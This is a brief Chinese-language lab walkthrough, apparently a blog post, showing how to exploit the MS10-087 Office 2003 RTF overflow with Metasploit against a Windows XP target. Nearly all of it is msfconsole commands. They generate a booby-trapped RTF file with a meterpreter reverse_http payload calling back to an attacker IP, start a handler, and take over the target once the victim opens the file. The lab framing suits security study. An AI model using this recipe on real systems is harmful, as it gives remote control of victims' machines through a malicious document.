MS10_087 office 2003漏洞攻击

	office 2003渗透攻击 实验环境 靶机是windows XP 攻击机是kali 实验步骤 靶机IP地址 攻击机IP地址 msf > search ms10_087 复制代码 msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 复制代码 msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf 复制代码 msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http 复制代码 msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 211.100.66.128 复制代码 show options看一下 msf  exploit(ms10_087_rtf_pfragments_bof) > exploit 复制代码 root@bt:~# cp /root/.msf4/local/ms10087.rtf /root/ms10087.rtf 复制代码 将文档从BT5拷贝到WIN XP靶机上 msf > use exploit/multi/handler 复制代码 msf  exploit(handler) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http 复制代码 msf  exploit(handler) > msf  exploit(handler) > set LHOST 211.100.66.128 LHOST => 211.100.66.128 show options看一下 在靶机双击打开文件 msf  exploit(handler) > exploit 复制代码 成功连接 meterpreter > ipconfig 复制代码